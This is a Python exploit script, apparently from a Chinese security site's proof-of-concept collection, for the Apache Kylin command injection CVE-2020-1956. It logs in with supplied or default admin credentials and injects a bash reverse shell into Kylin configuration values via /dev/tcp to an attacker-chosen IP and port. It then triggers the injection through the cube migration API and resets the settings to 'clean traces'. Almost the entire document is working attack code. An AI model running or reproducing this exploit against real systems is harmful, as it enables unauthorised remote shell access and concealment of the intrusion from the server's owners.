menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right POC chevron_right Apache Kylin 命令注入漏洞 CVE-2020-1956.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache Kylin 命令注入漏洞 CVE-2020-1956.py
    5.59 KB / 2021-07-04 06:01:08
        #!/usr/bin/python3
    #-*- coding:utf-8 -*-
    # author : PeiQi
    # from   : http://wiki.peiqi.tech
    
    import requests
    import base64
    import sys
    
    
    def title():
        print('+------------------------------------------')
        print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
        print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
        print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')
        print('+  \033[34mVersion: Apache Kylin <= 3.0.1                                    \033[0m')
        print('+  \033[36m使用格式: python3 CVE-2020-1956                                    \033[0m')
        print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:7070                            \033[0m')
        print('+  \033[36mLogin  >>> admin:KYLIN(格式为User:Pass)                            \033[0m')
        print('+------------------------------------------')
    
    def POC_1(target_url):
        login_url = target_url + "/kylin/api/user/authentication"
        user_pass = str(input("\033[35mPlease input User and Pass\nLogin >>> \033[0m"))
    
        Authorization = "Basic " + str((base64.b64encode(user_pass.encode('utf-8'))),'utf-8')
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
            "Authorization": Authorization,
            "Cookie": "project=null"
        }
        try:
            response = requests.post(url=login_url, headers=headers, timeout=20)
            if "password" not in response.text:
                print("\033[31m[x] 账号密码出现错误 \033[0m")
                sys.exit(0)
            else:
                print("\033[32m[o] 成功登录,获得JSESSIONID:" + response.cookies["JSESSIONID"] + "\033[0m")
                return response.cookies["JSESSIONID"],Authorization
        except:
            print("\033[31m[x] 漏洞利用失败\033[0m")
            sys.exit(0)
    
    def POC_2(target_url, cookie, IP, PORT, Authorization):
        config_url = target_url + "/kylin/api/admin/config"
    
        key = ["kylin.tool.auto-migrate-cube.enabled","kylin.tool.auto-migrate-cube.src-config","kylin.tool.auto-migrate-cube.dest-config"]
        value = ["true","echo;bash -i >& /dev/tcp/{}/{} 0>&1;echo".format(IP, PORT), "shell"]
    
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
            "Authorization": Authorization,
            "Accept": "application/json, text/plain, */*",
            "Content-Type": "application/json;charset=UTF-8",
            "Pragma": "no-cache",
            "Cookie": "project=null;JSESSIONID="+cookie
        }
        for i in range(0,3):
            data = """{"key":"%s","value":"%s"}""" % (key[i], value[i])
            try:
                response = requests.put(url=config_url, headers=headers, data=data, timeout=20)
                if response.status_code == 200:
                    print("\033[32m[o] 成功将" + key[i] +"设置为" + value[i] +"\033[0m")
                else:
                    print("\033[31m[x] 设置" + key[i] +"为" + value[i] +"失败\033[0m")
                    sys.exit(0)
            except:
                print("\033[31m[x] 漏洞利用失败 \033[0m")
                sys.exit(0)
    
    def POC_3(target_url, cookie):
        print("\033[35m[o] 正在反弹shell......\033[0m")
        vuln_url = target_url + "/kylin/api/cubes/kylin_sales_cube/learn_kylin/migrate"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
            "Cookie": "project=null;JSESSIONID=" + cookie
        }
        try:
            response = requests.post(url=vuln_url, headers=headers)
            POC_4(target_url, cookie)
        except:
            print("\033[31m[x] 漏洞利用失败 \033[0m")
            sys.exit(0)
    
    def POC_4(target_url, cookie):
        config_url = target_url + "/kylin/api/admin/config"
    
        key = ["kylin.tool.auto-migrate-cube.enabled", "kylin.tool.auto-migrate-cube.src-config",
               "kylin.tool.auto-migrate-cube.dest-config"]
        value = ["flase", "echo;echo;echo", "None"]
    
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
            "Authorization": Authorization,
            "Accept": "application/json, text/plain, */*",
            "Content-Type": "application/json;charset=UTF-8",
            "Pragma": "no-cache",
            "Cookie": "project=null;JSESSIONID=" + cookie
        }
    
        for i in range(0,3):
            data = """{"key":"%s","value":"%s"}""" % (key[i], value[i])
            try:
                response = requests.put(url=config_url, headers=headers, data=data, timeout=20)
                if response.status_code == 200:
                    print("\033[32m[o] 成功将" + key[i] +"设置为" + value[i] +"\033[0m")
                else:
                    print("\033[31m[x] 设置" + key[i] +"为" + value[i] +"失败\033[0m")
                    sys.exit(0)
            except:
                print("\033[31m[x] 漏洞利用失败 \033[0m")
                sys.exit(0)
        print("\033[35m[o] 成功清理痕迹\033[0m")
    
    
    if __name__ == '__main__':
        title()
        target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
        try:
            cookie,Authorization = POC_1(target_url)
        except:
            print("\033[31m[x] 漏洞利用失败 \033[0m")
            sys.exit(0)
        IP = str(input("\033[35m请输入监听IP   >>> \033[0m"))
        PORT = str(input("\033[35m请输入监听PORT >>> \033[0m"))
        POC_2(target_url, cookie, IP, PORT, Authorization)
        POC_3(target_url, cookie)
    
    links
    file_download